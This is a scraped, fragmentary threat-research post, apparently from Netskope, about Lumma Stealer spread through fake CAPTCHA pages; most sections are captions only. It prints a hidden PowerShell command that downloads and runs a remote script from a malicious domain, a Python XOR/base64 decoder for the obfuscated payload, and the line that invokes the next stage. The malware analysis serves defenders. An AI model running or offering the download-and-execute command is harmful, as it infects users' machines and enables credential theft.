Lumma Stealer: 偽のCAPTCHAと検出を回避するための新しい手法

January 23, 2025

Summary

Key findings

Details

Infection chain flow
Fake CAPTCHA instruction
Fake CAPTCHA JavaScript snippet
Example of the malicious command in the Run window
Powershell command executed by the HTA file
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h3.errantrefrainundocked.shop/riii2.aspx'))"
Example of the obfuscated PowerShell script
Relevant snippet responsible for the next stage execution
Formatted view of the relevant snippet
import base64

decimal_data = []
xor_key = b"AMSI_RESULT_NOT_DETECTED"
key_len = len(xor_key)
result = b""

encoded_str = "".join([chr(x) for x in decimal_data])
decoded_bytes = base64.b64decode(encoded_str)
i = 0

for i in range(len(decoded_bytes)):
result += bytes([decoded_bytes[i] ^ xor_key[i % key_len]])

print(result.decode())

The PowerShell line responsible for executing the next stage script can be translated into the following.

((Scriptblock -as [Type])::(Create)((fdsjnh))).(Invoke)()
Code snippet responsible for bypassing AMSI checks
Code snippet responsible for decoding and executing Lumma Stealer
Example of Lumma Stealer entry

Netskope Detection

Conclusions

IOCs

author image

Leandro Fróes

Leandro Fróes is a Senior Threat Research Engineer at Netskope, where he focuses on malware research, reverse engineering, automation and product improvement.
Leandro Fróes is a Senior Threat Research Engineer at Netskope, where he focuses on malware research, reverse engineering, automation and product improvement.
Keep a close eye on The Lens